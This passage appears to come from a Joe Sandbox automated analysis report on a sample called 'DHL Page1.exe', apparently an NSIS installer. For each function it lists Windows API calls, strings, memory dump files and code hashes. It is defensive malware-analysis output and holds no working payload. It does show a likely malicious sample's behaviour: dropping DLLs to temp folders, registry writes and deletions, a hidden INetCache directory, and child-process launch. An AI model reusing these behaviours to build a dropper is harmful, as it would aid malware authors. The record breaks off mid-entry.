wsprintfW.USER32 ref: 004065F0
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406604

Strings

\, xrefs: 004065C6
%s%S.dll, xrefs: 004065EA
UXTHEME, xrefs: 004065A7

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 3e72c25e5c980310d69f0fc98d502c706aefd7165560ee14c5a883ad11fb6337
Instruction ID: 1dc8b8010af983826084558677c073d96b5143d4abd8efd7bb109387f395bce7
Opcode Fuzzy Hash: 3e72c25e5c980310d69f0fc98d502c706aefd7165560ee14c5a883ad11fb6337
Instruction Fuzzy Hash: 3DF0F670510229BADB20AB64ED0EF9B366CAB00305F50403AA546F10D0FF78DB29CBA8

Function 004023EA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402428
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsv4331.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402448
RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsv4331.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402488
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsv4331.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040256D

Strings

C:\Users\user\AppData\Local\Temp\nsv4331.tmp, xrefs: 00402439, 00402447, 0040245E, 00402472, 0040247D

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsv4331.tmp
API String ID: 1356686001-2145028349
Opcode ID: 9fb46ae10ccb980b72cb62b64bc586aab50fc90a6667cfc23588e109db3e8db1
Instruction ID: 1243140a8c18a0bfbd33b88d0d7f89bc38a26af17d7c8fd6f4b1eeef8c21712f
Opcode Fuzzy Hash: 9fb46ae10ccb980b72cb62b64bc586aab50fc90a6667cfc23588e109db3e8db1
Instruction Fuzzy Hash: 3D216F71D00118BEEB00AFA1DE89EAF7B78EB44398F11403AF505B71D1D7B88D419B28

Function 00405E38 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405E56
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\DHL Page1.exe",0040346A,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403694), ref: 00405E71

Strings

"C:\Users\user\Desktop\DHL Page1.exe", xrefs: 00405E38
nsa, xrefs: 00405E45
C:\Users\user\AppData\Local\Temp\, xrefs: 00405E3D

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\DHL Page1.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-3380365781
Opcode ID: ba752c91d03ec01f63b9c4f62f06acfe59d2ba7d741f037e803b5e880a418ded
Instruction ID: 1e1b0ee3726139050bbb5f95774bfa2ccdd562767932c9ee3624734809f60390
Opcode Fuzzy Hash: ba752c91d03ec01f63b9c4f62f06acfe59d2ba7d741f037e803b5e880a418ded
Instruction Fuzzy Hash: B9F06D7A600608BFDB008B59DE05AABBBA8EB91710F10443AEE44F7180E6B09A548B64

Function 00402C93 Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402CB4
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402CF0
RegCloseKey.ADVAPI32(?), ref: 00402CF9
RegCloseKey.ADVAPI32(?), ref: 00402D1E
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402D3C

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 52e95f4ee33b084a847098dca0b6bc6075d283d936cc9c0cdb912d4f1af94a51
Instruction ID: 1a620f8704b1326881f6e1d7686825e2d06aecdcbe48d7084eb45f1d79456e14
Opcode Fuzzy Hash: 52e95f4ee33b084a847098dca0b6bc6075d283d936cc9c0cdb912d4f1af94a51
Instruction Fuzzy Hash: 2111377150010CBFEF219F90DE89DAE7B6DFB54348F10003AFA01A11E0D7B59E69AA29

Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON

Download Yara Rule

APIs

Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D

GlobalFree.KERNEL32(00000000), ref: 10001804
FreeLibrary.KERNEL32(?), ref: 1000187B
GlobalFree.KERNEL32(00000000), ref: 100018A0

Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8

Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7

Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD

Strings

, xrefs: 10001881

Memory Dump Source

Source File: 00000000.00000002.123239636452.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.123239605456.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.123239665702.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.123239691897.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_DHL Page1.jbxd

Similarity

API ID: Global$Free$Alloc$Librarylstrcpy
String ID:
API String ID: 1791698881-3916222277
Opcode ID: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
Opcode Fuzzy Hash: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761

Function 00401C19 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1

Strings

!, xrefs: 00401C55

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: d0dd36373e58090cc10c8e7865d3dfed9077db1d0cdb3b09aea54bad34b303c4
Instruction ID: 46d8feb468198c86c3f965ed66e07e593edd6f9980b7d84e6d51a540c602a89e
Opcode Fuzzy Hash: d0dd36373e58090cc10c8e7865d3dfed9077db1d0cdb3b09aea54bad34b303c4
Instruction Fuzzy Hash: BF21C171908219AEEF04AFA4DE4AABE7BB4EF44304F14453EF505BA1D0D7B88541DB18

Function 00406101 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,00406374,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 0040612B
RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00406374,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 0040614C
RegCloseKey.ADVAPI32(?,?,00406374,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 0040616F

Strings

Call, xrefs: 00406104

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Call
API String ID: 3677997916-1824292864
Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
Instruction ID: bc20ea416eaf490cc29d32db83e74b31e5ada777993a97a24a2aa5475f1120d1
Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
Instruction Fuzzy Hash: 14015A3110020AEADF218F26ED08EDB3BB9EF48350F01403AF845D6220D734D964CBA5

Function 00401ED5 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00405393: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053CB
Part of subcall function 00405393: lstrlenW.KERNEL32(00402EAD,Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053DB
Part of subcall function 00405393: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00402EAD,00402EAD,Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00000000,00000000,00000000), ref: 004053EE
Part of subcall function 00405393: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll), ref: 00405400
Part of subcall function 00405393: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405426
Part of subcall function 00405393: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405440
Part of subcall function 00405393: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040544E

Part of subcall function 00405914: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430290,Error launching installer), ref: 0040593D
Part of subcall function 00405914: CloseHandle.KERNEL32(?), ref: 0040594A

WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401F04
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401F19
GetExitCodeProcess.KERNEL32(?,?), ref: 00401F26
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401F4D

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
String ID:
API String ID: 3585118688-0
Opcode ID: 0d40370652eb81003481abe3ce29e96ae05eb3161985268492f381a3e2b30258
Instruction ID: e614f92d6b01e5dc42dea4a87df5fedfc64ce03d1853b5f6b9edcf2ca3e8dd58
Opcode Fuzzy Hash: 0d40370652eb81003481abe3ce29e96ae05eb3161985268492f381a3e2b30258
Instruction Fuzzy Hash: 2811AD31904109FBCF10AFA0DD84ADD7AB6EF00354F21803BF606B60E1C7B98A92DB59

Function 0040319D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,0040314B,000000FF,00000000,00000000,0040A230,?), ref: 004031C2

Strings

0A, xrefs: 00403217

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: FilePointer
String ID: 0A
API String ID: 973152223-2007828011
Opcode ID: 599661cd1e1f4e026d5e2592e4daac1fd1dfe16f38b101af0cb72e1788b7423d
Instruction ID: 1b31a9a46ac4025ad01e28160671f4af54b66250eb8a32785efaeec8d4788e79
Opcode Fuzzy Hash: 599661cd1e1f4e026d5e2592e4daac1fd1dfe16f38b101af0cb72e1788b7423d
Instruction Fuzzy Hash: 34316F30201219FFDB209F95EE84A9F7F68EB05759B20447FF904E61D0D2789A509BA9

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00405C93: CharNextW.USER32(?,?,0042FA90,?,00405D07,0042FA90,0042FA90, 4Ou.Ou,?,754F2EE0,00405A45,?,754F3420,754F2EE0,00000000), ref: 00405CA1
Part of subcall function 00405C93: CharNextW.USER32(00000000), ref: 00405CA6
Part of subcall function 00405C93: CharNextW.USER32(00000000), ref: 00405CBE

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 00405862: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004058A5

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage,?,00000000,000000F0), ref: 0040164D

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage, xrefs: 00401640

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage
API String ID: 1892508949-2332303660
Opcode ID: 0eba2085d3260377ef01b64c51b78cf437421a5ff583a9c90046e2813c0af6be
Instruction ID: 7982f2e2caade167f262f2ac7f0c98440bfe6d5d070035d5abd9b478c5482f04
Opcode Fuzzy Hash: 0eba2085d3260377ef01b64c51b78cf437421a5ff583a9c90046e2813c0af6be
Instruction Fuzzy Hash: 3711E631504514ABCF30BFA5CD4199F36A0EF15369B25493BEA02B21F1DB3E4D819B5E

Function 00405CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406234: lstrcpynW.KERNEL32(?,?,00000400,00403519,00433F20,NSIS Error), ref: 00406241

Part of subcall function 00405C93: CharNextW.USER32(?,?,0042FA90,?,00405D07,0042FA90,0042FA90, 4Ou.Ou,?,754F2EE0,00405A45,?,754F3420,754F2EE0,00000000), ref: 00405CA1
Part of subcall function 00405C93: CharNextW.USER32(00000000), ref: 00405CA6
Part of subcall function 00405C93: CharNextW.USER32(00000000), ref: 00405CBE

lstrlenW.KERNEL32(0042FA90,00000000,0042FA90,0042FA90, 4Ou.Ou,?,754F2EE0,00405A45,?,754F3420,754F2EE0,00000000), ref: 00405D49
GetFileAttributesW.KERNELBASE(0042FA90,0042FA90,0042FA90,0042FA90,0042FA90,0042FA90,00000000,0042FA90,0042FA90, 4Ou.Ou,?,754F2EE0,00405A45,?,754F3420,754F2EE0), ref: 00405D59

Strings

4Ou.Ou, xrefs: 00405CF2

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: 4Ou.Ou
API String ID: 3248276644-1848101107
Opcode ID: 53e12d784ef837e8db80ec3fb7baa10e40d76a96b883b7f92eedeb36793dbc32
Instruction ID: 4ec1b5d8fbd52b75359688d51f087b2d563f7ccff9bef2ccb556163a4013e6ac
Opcode Fuzzy Hash: 53e12d784ef837e8db80ec3fb7baa10e40d76a96b883b7f92eedeb36793dbc32
Instruction Fuzzy Hash: 0DF02829105E1116D722333A2C0DFAF1559CEC236471A853FF851B52C1DB3C88438CBE

Function 00405914 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430290,Error launching installer), ref: 0040593D
CloseHandle.KERNEL32(?), ref: 0040594A

Strings

Error launching installer, xrefs: 00405927

Memory Dump Source

